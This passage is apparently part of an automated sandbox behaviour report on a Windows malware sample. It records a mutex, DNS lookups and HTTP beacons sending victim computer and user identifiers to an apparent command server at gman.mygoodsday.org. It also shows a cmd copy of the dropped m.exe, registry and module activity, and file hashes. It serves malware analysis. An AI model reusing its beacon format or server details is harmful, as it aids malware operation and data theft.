1 | ||
| Get Time | type = Ticks, time = 202703 |
|
2 | ||
| Get Time | type = Performance Ctr, time = 20274009061 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20274022438 |
|
1 | ||
| Get Time | type = Ticks, time = 202781 |
|
36 | ||
| Get Time | type = Performance Ctr, time = 20280977727 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20280992430 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281050673 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281060612 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281112855 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281122710 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281179720 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281189565 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281239458 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281249260 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281311965 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281321832 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281372692 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281382565 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281437376 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281447227 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281505471 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281515473 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281566495 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281576280 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281733664 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281743790 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281796534 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281806609 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281865896 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281877248 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281928135 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20281937685 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282002294 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282011978 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282065814 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282075557 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282138429 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282148196 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282212311 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282223594 |
|
1 | ||
| Get Time | type = Ticks, time = 202796 |
|
26 | ||
| Get Time | type = Performance Ctr, time = 20282332127 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282342905 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282423973 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282435229 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282502026 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282515498 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282586921 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282597135 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282671283 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282683237 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282748804 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282760554 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282848316 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282861803 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282921407 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282933751 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282989890 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20282999976 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283057624 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283068320 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283129804 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283142946 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283203418 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283213637 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283269352 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20283279140 |
|
1 | ||
| Get Time | type = Ticks, time = 202937 |
|
23 | ||
| Get Time | type = Performance Ctr, time = 20296917475 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20296932890 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297012795 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297024274 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297095462 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297106497 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297165522 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297176449 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297238049 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297249071 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297308579 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297319325 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297378292 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297389074 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297453492 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297465259 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297516953 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297675021 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297749661 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297761172 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297815478 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297826448 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297882559 |
|
1 | ||
| Get Time | type = Ticks, time = 202953 |
|
13 | ||
| Get Time | type = Performance Ctr, time = 20297914296 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297984779 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20297995886 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298059863 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298070879 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298129187 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298140124 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298208542 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298219135 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298270996 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298281805 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298345567 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20298356587 |
|
1 | ||
| Get Time | type = Ticks, time = 203062 |
|
18 | ||
| Get Time | type = Performance Ctr, time = 20309775128 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20309789004 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20309856565 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20309868627 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20309936099 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20309946079 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310005511 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310015744 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310074479 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310083806 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310143235 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310153359 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310205584 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310215494 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310271781 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310281989 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310333879 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310343503 |
|
1 | ||
| Get Time | type = Ticks, time = 203078 |
|
27 | ||
| Get Time | type = Performance Ctr, time = 20310422735 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310432671 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310488220 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310498411 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310552960 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310562762 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310630165 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310640246 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310692274 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310702260 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310760013 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310770441 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310836334 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310846137 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310898937 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310908855 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310971179 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20310981044 |
|
1 | ||
| Get Time | type = Performance Ctr, time = 20311035317 |
|
1 | ||
|
For performance reasons, the remaining 11 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Mutex (5030)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MutexSDEN |
|
1 | |
| Create | - |
|
1 | |
| Open | mutex_name = MutexSDEN, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 | |
| Release | - |
|
5027 |
Network Behavior
DNS (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = gman.mygoodsday.org, address_out = 185.143.173.235, service = 80 |
|
3 |
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 702 bytes |
| Total Data Received | 534 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 185.143.173.235 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | gman.mygoodsday.org |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 222 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse) |
|
1 | |
| Open Connection | protocol = http, server_name = gman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=START |
|
1 | |
| Send HTTP Request | headers = Host: gman.mygoodsday.org, Keep-Alive: 300, Connection: keep-alive, User-Agent: Mozilla/4.0 (compatible; Synapse), url = gman.mygoodsday.org/addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=START |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | gman.mygoodsday.org |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 238 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse) |
|
1 | |
| Open Connection | protocol = http, server_name = gman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=[ALL]6088DED4F047F45E |
|
1 | |
| Send HTTP Request | headers = Host: gman.mygoodsday.org, Keep-Alive: 300, Connection: keep-alive, User-Agent: Mozilla/4.0 (compatible; Synapse), url = gman.mygoodsday.org/addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=[ALL]6088DED4F047F45E |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; Synapse) |
| Server Name | gman.mygoodsday.org |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 242 bytes |
| Data Received | 178 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; Synapse) |
|
1 | |
| Open Connection | protocol = http, server_name = gman.mygoodsday.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=6088DED4F047F45E|5152|1GB |
|
1 | |
| Send HTTP Request | headers = Host: gman.mygoodsday.org, Keep-Alive: 300, Connection: keep-alive, User-Agent: Mozilla/4.0 (compatible; Synapse), url = gman.mygoodsday.org/addrecord.php?apikey=sden_api_key&compuser=NQDPDE|FD1HVy&sid=L4Ik1DToI3z96xes&phase=6088DED4F047F45E|5152|1GB |
|
1 | |
| Read Response | size = 178, size_out = 178 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
156
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /C copy /V /Y "C:\Users\FD1HVy\Desktop\m.exe" "C:\Users\FD1HVy\Desktop\NWqZQdpD.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Child Process |
| Unmonitor | End Time: 00:01:20, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe9c |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F54
0x
4D0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\FD1HVy\Desktop\m.exe | 1.16 MB |
MD5:
291bfa021dc98473954d089bdc1fad35
SHA1: baa51f3c50a8301b75a8f4c8cb6536bef1c61806 SHA256: ffb44b8de928bd2c1b885e1c35bff3311631a83af9a18253aaf0d9fa7a901aa0 SSDeep: 24576:exsxl/OOeI7RC4CJR5ez+IlnRJE5AxBK9jCdAsr+N:tfjREqyx9 |
|
|
Host Behavior
File (116)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\m.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\FD1HVy\Desktop\m.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | - | type = size, size_out = 0 |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
9 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | - | - |
|
23 | |
| Open | - | - |
|
24 | |
| Copy | C:\Users\FD1HVy\Desktop\NWqZQdpD.exe | source_filename = C:\Users\FD1HVy\Desktop\m.exe |
|
1 | |
| Read | - | size = 512, size_out = 512 |
|
1 | |
| Read | - | size = 65024, size_out = 65024 |
|
18 | |
| Read | - | size = 65024, size_out = 65024 |
|
18 | |
| Read | - | size = 65024, size_out = 44544 |
|
1 | |
| Read | - | size = 44544, size_out = 44544 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_PAGE_PRIORITY |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 |
Process #5: nwqzqdpd.exe
500
1
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\fd1hvy\desktop\nwqzqdpd.exe |
| Command Line | "C:\Users\FD1HVy\Desktop\NWqZQdpD.exe" -n |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc58 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ED8
0x
468
0x
E64
0x
D70
0x
A78
0x
A80
0x
CAC
0x
E44
0x
A90
0x
A24
0x
BE4
0x
5F8
0x
A84
0x
3CC
0x
83C
0x
D3C
0x
DF8
0x
7B8
0x
9B4
0x
4E4
0x
7B4
0x
D34
0x
E90
0x
D28
0x
B6C
0x
DDC
0x
DB0
0x
DA8
0x
6D8
0x
7A4
0x
D6C
0x
D88
0x
42C
0x
324
0x
F10
0x
D7C
0x
8E8
0x
C9C
0x
D90
0x
9FC
0x
EEC
0x
F54
0x
FC0
0x
E88
0x
E5C
0x
ED4
0x
F68
0x
A88
0x
D60
0x
AC8
0x
8AC
0x
F48
0x
F64
0x
1004
0x
1008
0x
100C
0x
1010
0x
1014
0x
1018
0x
1020
0x
1024
0x
1028
0x
102C
0x
1030
0x
1034
0x
1038
0x
1170
0x
1184
|
Host Behavior
File (309)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | -n | type = file_attributes |
|
5 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
60 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 96 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 112 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 128 |
|
45 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 42 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 126 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 71 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
75 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
21 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
16 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
11 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 128 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
1 |
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Module (93)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x75e90000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x746a0000 |
|
1 | |
| Get Handle | c:\users\fd1hvy\desktop\nwqzqdpd.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75bb0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x77920000 |
|
1 | |
| Get Filename | c:\users\fd1hvy\desktop\nwqzqdpd.exe | process_name = c:\users\fd1hvy\desktop\nwqzqdpd.exe, file_name_orig = C:\Users\FD1HVy\Desktop\NWqZQdpD.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\nwqzqdpd.exe, file_name_orig = C:\Users\FD1HVy\Desktop\NWqZQdpD.exe, size = 261 |
|
3 | |
| Get Filename | c:\users\fd1hvy\desktop\nwqzqdpd.exe | process_name = c:\users\fd1hvy\desktop\nwqzqdpd.exe, file_name_orig = C:\Users\FD1HVy\Desktop\NWqZQdpD.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x75ea7250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x75ea4f10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x75ea7290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x75ea5130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x75efeea0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75bca610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x75c152c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x75c16560 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75bed610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x75bee3e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x75bedb10 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x75c15800 |
|
1 | |
